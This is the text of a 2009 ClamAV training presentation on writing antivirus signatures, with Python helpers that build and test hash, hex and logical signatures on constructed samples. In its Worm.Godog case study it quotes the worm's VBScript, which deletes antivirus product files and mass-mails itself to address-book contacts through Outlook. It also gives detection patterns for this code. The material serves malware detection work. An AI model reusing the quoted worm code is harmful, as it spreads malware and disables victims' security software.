
Writing ClamAV Signatures

Alain Zidouemba March 4, 2009

About the presenter

Alain Zidouemba
VRT Research Engineer for over a year
Primary responsibilities:
Malware research & signature generation (ClamAV)
Vulnerability research & rule generation (Snort)
Before Sourcefire: Anti-Malware Research Engineer

Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats: .hdb, .mdb, .ndb, .ldb
Whitelisting
Q&A

ClamAV

What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities, including:
A flexible and scalable multi-threaded daemon (clamd)
A command line scanner (clamscan)
An advanced tool for automatic database updates (freshclam)
sigtool (more on this later)

Where can I get ClamAV from?

Latest stable release: ClamAV 0.94.2
http://www.clamav.net/download/sources

Most popular UNIX operating systems are supported: GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X

An up-to-date list of binary packages is available on our website:
http://clamav.net/download/packages

Why learn how to write sigs?

"I thought Sourcefire released signature updates several times a day!"

ClamAV malware detection

Goal: recognize and block malware
Detection is file-centric: the focus is on recognizing malicious code in a file
Not intended to replace desktop AV; ClamAV is a first line of defense

ClamAV Virus Database (CVD)

The ClamAV project distributes two CVD files: main.cvd and daily.cvd

sigtool (ships with ClamAV) can display detailed information on CVD files (sigtool --info):

Various signature files in the .cvd archive

Writing signatures for ClamAV

Hash database: *.hdb

The format for .hdb files is as follows:
MD5:Size:MalwareName

To create a signature for test.exe, use the --md5 option of sigtool (sigtool --md5 test.exe prints the MD5:Size:Name line, with the file name as the default detection name):

Hash database: *.hdb (cont'd)
That's it! Save the line to a .hdb file and the signature is ready to be used (clamscan -d test.hdb loads it):

The name for the detection can be changed by editing the third field:

MD5, PE-section based: *.mdb

The format for .mdb files is as follows:
PESectionSize:MD5:MalwareName

The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files and then run sigtool with the --mdb option:

Case study: Trojan.Bagle-328

IDA Pro indicates that the sample is packed; PEiD identifies the packer as Themida.

Case study: Trojan.Bagle-328 (cont'd)

Themida is used by malware writers, but also by legitimate products, so a signature that hashes the packer's own code would be a likely false positive. We can use pe-sig, a Ruby script that creates a signature for each section of a PE file, and keep the one for a section that is specific to the sample:

Finally, the signature is:

237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
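As an added example (not code from the slides, from ClamAV or from the pe-sig script), the Python below reproduces what sigtool --md5, sigtool --mdb and pe-sig compute, then checks files against the resulting .hdb and .mdb lines. Everything it scans is constructed inline: build_pe() emits a minimal PE32 header and section table (not a runnable program), the file name hash_sigs.py and the detection name Trojan.Test-1 are hypothetical, and the "malware" and "legitimate" samples share an identical .text section to stand in for the Themida problem, so a section signature taken from the shared packer stub fires on the clean file while one taken from the sample-specific .data section does not.

```python
"""hash_sigs.py (hypothetical name): build and check .hdb / .mdb style hash signatures."""
import hashlib
import struct


def hdb_signature(data: bytes, name: str) -> str:
    """.hdb line: MD5 of the whole file, its size in bytes, and the detection name."""
    return f"{hashlib.md5(data).hexdigest()}:{len(data)}:{name}"


def pe_sections(data: bytes):
    """Yield (name, SizeOfRawData, raw bytes) for every section header in a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16
    nsections, opt_size = struct.unpack_from("<H12xH", data, e_lfanew + 6)
    table = e_lfanew + 24 + opt_size            # 4 (signature) + 20 (COFF header)
    for i in range(nsections):
        hdr = table + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        yield name, raw_size, data[raw_ptr:raw_ptr + raw_size]


def mdb_signatures(data: bytes, name: str) -> list:
    """One .mdb line per non-empty section: PESectionSize:MD5(section raw data):name."""
    return [f"{size}:{hashlib.md5(raw).hexdigest()}:{name}"
            for _, size, raw in pe_sections(data) if size]


def scan(data: bytes, hdb_lines, mdb_lines):
    """Return the detection name of the first matching .hdb or .mdb entry, else None."""
    whole = f"{hashlib.md5(data).hexdigest()}:{len(data)}"
    for line in hdb_lines:
        md5, size, name = line.split(":", 2)
        if f"{md5}:{size}" == whole:
            return name
    sections = {f"{size}:{hashlib.md5(raw).hexdigest()}"
                for _, size, raw in pe_sections(data) if size}
    for line in mdb_lines:
        size, md5, name = line.split(":", 2)
        if f"{size}:{md5}" in sections:
            return name
    return None


def build_pe(sections) -> bytes:
    """Constructed test input: a minimal PE32 layout (not a runnable program) whose
    section table points at the given (name, raw_bytes) pairs."""
    opt_size, e_lfanew = 224, 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = b"\x0b\x01" + bytes(opt_size - 2)      # PE32 magic, rest zeroed
    ptr = e_lfanew + 24 + opt_size + 40 * len(sections)
    table = body = b""
    for name, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(raw), 0x1000, len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed samples: a "malware" and a "legitimate" file that share the same
# packer stub in .text (stand-in for a Themida stub) and differ only in .data.
STUB = b"\x60\xe8\x00\x00\x00\x00\x5d" * 20
MALWARE = build_pe([(".text", STUB), (".data", b"MALWARE PAYLOAD " * 8)])
LEGIT = build_pe([(".text", STUB), (".data", b"legit payload " * 8)])


def demo() -> dict:
    hdb = [hdb_signature(MALWARE, "Trojan.Test-1")]
    mdb_all = mdb_signatures(MALWARE, "Trojan.Test-1")        # one line per section
    stub_md5 = hashlib.md5(STUB).hexdigest()
    mdb_safe = [line for line in mdb_all if line.split(":")[1] != stub_md5]  # drop packer section
    return {
        "hdb_hits_malware": scan(MALWARE, hdb, []),
        "hdb_hits_legit": scan(LEGIT, hdb, []),
        "stub_section_false_positive": scan(LEGIT, [], mdb_all),
        "payload_section_on_legit": scan(LEGIT, [], mdb_safe),
        "payload_section_on_malware": scan(MALWARE, [], mdb_safe),
    }


if __name__ == "__main__":
    print(hdb_signature(MALWARE, "Trojan.Test-1"))
    print("\n".join(mdb_signatures(MALWARE, "Trojan.Test-1")))
    print(demo())
```

The section hash uses SizeOfRawData bytes read from PointerToRawData, which is also the size that goes into the first field of the .mdb line; sections with a raw size of zero are skipped. The practical check is the one demo() performs: before shipping a section signature, hash the same section in a known-clean file that uses the same packer and make sure it does not match.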

Extended sig. format: *.ndb

The format for .ndb files is as follows:
MalwareName:TargetType:Offset:HexSignature

TargetType is one of the following numbers specifying the type of the target file:
0: Any file
1: Portable Executable
2: OLE2 component (eg: VBA script)
3: HTML (normalized)
4: Mail file
5: Graphics
6: ELF
7: ASCII text file (normalized)

Case study: Trojan.Exchanger

Many samples that are very similar, yet not identical, so one hash signature per file does not scale

Case study: Trojan.Exchanger (cont'd)

5.exe:

Opcode:
e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger (cont'd)

7.exe:

Opcode:
e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger (cont'd)

Signature for 5.exe:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature for 7.exe:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

The two differ only in the four-byte immediate of the add ebx, imm32 instruction (81 c3 xx xx xx xx), so we replace those bytes with the {4} wildcard ({n} matches exactly n arbitrary bytes; {-n} would match up to n). One signature then detects both 5.exe and 7.exe:
Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger (cont'd)

Moreover, for 5.exe:
EP: 0x4094E0, binary string at 0x4095C5

For 7.exe:
EP: 0x406D87, binary string at 0x406E6C

In both cases the distance between the EP and our binary string is the same: 0xE5 = 229 (decimal)

Case study: Trojan.Exchanger (cont'd)

Finally we can rewrite the signature with an entry-point-relative offset:
Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

This signature is more precise (it only fires 229 bytes past the entry point instead of anywhere in the file) and still matches other samples:

Logical signatures: *.ldb

Logical signatures were introduced in ClamAV 0.94. The format for .ldb files is as follows:
SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...

Each subsignature is a hex body in the .ndb syntax; the logical expression refers to the subsignatures by index and combines them with & and |.

Case study: Worm.Godog

A mass-mailer worm; the code is in VBS:
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")

Case study: Worm.Godog (cont'd)

After normalization (the text is lower-cased, which is why the hex below encodes lower-case strings), we can create 4 signatures to detect each attempt to disable AV tools. Each one encodes fileexists (, then up to 25 bytes, then & "\<product path>, then up to 100 bytes, then .deletefile (, then up to 25 bytes, then & "\<product path> again:
(0) Kaspersky Antivirus Personal / Kaspersky Antivirus Personal Pro:
66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro:
66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal:
66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98:
66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e

Case study: Worm.Godog (cont'd)

The worm also sends itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")

Case study: Worm.Godog (cont'd)

A signature to detect this mass-mailing portion of the file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64

Finally, we can write this highly flexible signature, which fires when any one of the AV-killer subsignatures (0) to (3) is found together with the mailer subsignature (4):

Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)

in a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
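As an added example that is not part of the slides or of ClamAV itself, the Python below implements the subset of the .ndb and .ldb matching logic used in the Trojan.Exchanger and Worm.Godog case studies: the hex body is translated into a regular expression ({n} exactly n bytes, {-n} up to n, {n-} at least n, {n-m} between n and m, ?? one arbitrary byte, * any run), the offset field handles *, absolute and EP-relative values, and the logical expression is evaluated over the subsignature hits. Assumptions: the file name sig_match.py is hypothetical; the entry-point file offset is passed in by the caller (the script does no PE parsing); the 5.exe/7.exe stand-ins and the Worm.Godog source excerpt are constructed inline; normalize_ascii() is a simplified lower-case-and-collapse-whitespace stand-in for ClamAV's text normalization; and logical expressions with match counts are not supported.

```python
"""sig_match.py (hypothetical name): matcher for the .ndb/.ldb subset used on these slides.
Body syntax: hex bytes, ??, *, {n}, {-n}, {n-}, {n-m}. Offsets: *, absolute, EP+n/EP-n.
Logical expressions: subsig indices joined with &, | and parentheses (no count forms)."""
import re

def hex_to_regex(body: str) -> bytes:
    """Translate a ClamAV hex body into an equivalent bytes regex (compile with re.DOTALL)."""
    tokens = re.findall(r"\{[^}]*\}|\*|\?\?|[0-9a-fA-F]{2}", body)
    if "".join(tokens) != body:
        raise ValueError(f"malformed hex body: {body}")
    out = []
    for tok in tokens:
        if tok == "*":
            out.append(b".*")                    # any number of bytes
        elif tok == "??":
            out.append(b".")                     # exactly one arbitrary byte
        elif tok.startswith("{"):                # {n} exact, {-n} up to n, {n-} at least n, {n-m} range
            lo, dash, hi = tok[1:-1].partition("-")
            out.append(b".{%d,%s}" % (int(lo or 0), hi.encode()) if dash else b".{%d}" % int(lo))
        else:
            out.append(b"\\x" + tok.lower().encode())
    return b"".join(out)

def match_ndb(line: str, data: bytes, ep=None) -> bool:
    """line = MalwareName:TargetType:Offset:HexSignature. ep is the entry point's file
    offset, supplied by the caller because locating it needs PE parsing."""
    _name, _target, offset, body = line.split(":", 3)
    pat = re.compile(hex_to_regex(body), re.DOTALL)
    if offset == "*":
        return pat.search(data) is not None
    if offset.startswith("EP"):
        if ep is None:
            raise ValueError("EP-relative offset but no entry point given")
        pos = ep + int(offset[2:])               # "EP+229" -> int("+229")
    else:
        pos = int(offset)
    return pat.match(data, pos) is not None      # anchored exactly at pos

def match_ldb(line: str, data: bytes) -> bool:
    """line = Name;Target:N;LogicalExpression;Subsig0;Subsig1;... Every subsig is searched
    anywhere in data; the expression is then evaluated over the hit/miss results."""
    _name, _target, expr, *subsigs = line.split(";")
    hits = [re.compile(hex_to_regex(s), re.DOTALL).search(data) is not None for s in subsigs]
    expr = expr.replace(" ", "")
    if not re.fullmatch(r"[0-9()&|]+", expr):
        raise ValueError(f"unsupported logical expression: {expr}")
    py = re.sub(r"\d+", lambda m: str(hits[int(m.group())]), expr)
    return bool(eval(py.replace("&", " and ").replace("|", " or "), {"__builtins__": {}}))

def normalize_ascii(data: bytes) -> bytes:
    """Simplified stand-in for ClamAV's text normalisation: lower-case, collapse whitespace."""
    return re.sub(rb"\s+", b" ", data.lower())

def sub(*parts) -> str:
    """Build a hex body from literal strings (hex-encoded) and {..} wildcards (kept as is)."""
    return "".join(p if p.startswith("{") else p.encode().hex() for p in parts)

# Trojan.Exchanger: constructed stand-ins for 5.exe and 7.exe, opcode run 229 bytes past an
# assumed entry point file offset of 0; EXCH_SHIFTED moves it one byte further away.
EXCHANGER_SIG = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
EXCH_5 = bytes(229) + bytes.fromhex("e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4")
EXCH_7 = bytes(229) + bytes.fromhex("e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4")
EXCH_SHIFTED = b"\0" + EXCH_5

# Worm.Godog: the five subsignatures from the slides rebuilt from the strings they encode,
# plus a constructed excerpt of the worm's source (one AV-killer block and the mail loop).
GODOG_LDB = "Worm.Godog;Target:0;((0|1|2|3)&(4));" + ";".join([
    sub("fileexists (", "{-25}", ' & "\\kaspersky lab\\kaspersky antivirus personal', "{-100}",
        ".deletefile (", "{-25}", ' & "\\kaspersky lab\\kaspersky antivirus personal'),
    sub("fileexists(", "{-25}", ' & "\\antiviral toolkit pro', "{-100}",
        ".deletefile (", "{-25}", ' & "\\antiviral toolkit pro'),
    sub("fileexists (", "{-25}", ' & "\\avpersonal', "{-100}", ".deletefile (", "{-25}", ' & "\\avpersonal'),
    sub("fileexists (", "{-25}", ' & "\\trend pc-cillin', "{-100}", ".deletefile (", "{-25}", ' & "\\trend pc-cillin'),
    sub("for ", "{-10}", " = 1 to ", "{-10}", ".addressentries.count", "{-100}", "recipients.add", "{-100}",
        "if ", "{-10}", " > ", "{-5}", " then exit for", "{-300}", ".attachments.add", "{-150}", ".send"),
])
GODOG_SAMPLE = rb'''if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "C.Attachments.Add" & Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.Send"
'''

def demo() -> dict:
    av_killer_only = GODOG_SAMPLE.split(b"mail.")[0]       # AV-killer block without the mailer
    return {
        "exchanger_5": match_ndb(EXCHANGER_SIG, EXCH_5, ep=0),
        "exchanger_7": match_ndb(EXCHANGER_SIG, EXCH_7, ep=0),
        "exchanger_shifted_at_ep": match_ndb(EXCHANGER_SIG, EXCH_SHIFTED, ep=0),
        "exchanger_shifted_anywhere": match_ndb(EXCHANGER_SIG.replace("EP+229", "*"), EXCH_SHIFTED),
        "godog_full": match_ldb(GODOG_LDB, normalize_ascii(GODOG_SAMPLE)),
        "godog_av_killer_only": match_ldb(GODOG_LDB, normalize_ascii(av_killer_only)),
    }

if __name__ == "__main__":
    print(demo())
```

Because the Godog subsignatures are rebuilt from the strings they encode, the script doubles as a check that the hex on the previous slides decodes to fileexists (, .deletefile ( and the product paths it is supposed to; the sample that carries only the AV-killer block is rejected by the logical expression, since (4) is required, and the shifted Exchanger stand-in shows how the EP+229 offset rules out a match that a plain * offset would accept.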

Whitelisting
To whitelist a specific file, create an entry in a database file with the extension .fp following the MD5 signature format:
MD5:FileSize:Comment

Whitelisting (cont'd)
To whitelist (ignore) a specific signature inside main.cvd, add the following entry to a local file named local.ign:
db_name:line_number:signature_name

To ignore myTestSignature at line 23 in test.ndb:
test.ndb:23:myTestSignature

daily.ign:

More questions?
clamav-users@lists.clamav.net - user questions
clamav-devel@lists.clamav.net - technical discussions
Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net
If you have questions or comments on this presentation: azidouemba@sourcefire.com

ClamAV/VRT/Sourcefire
Websites
http://www.clamav.net
http://www.snort.org
http://www.sourcefire.com

Blogs
http://clam-av.blogspot.com
http://vrt-sourcefire.blogspot.com

Contribute
Sample submission:
http://www.clamav.net/sendvirus/

Upload statistics:
freshclam --submit-stats

Bug submission:
http://bugs.clamav.net

Q&A

NOW GO AND WRITE SIGNATURES!


(Slide image source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714)
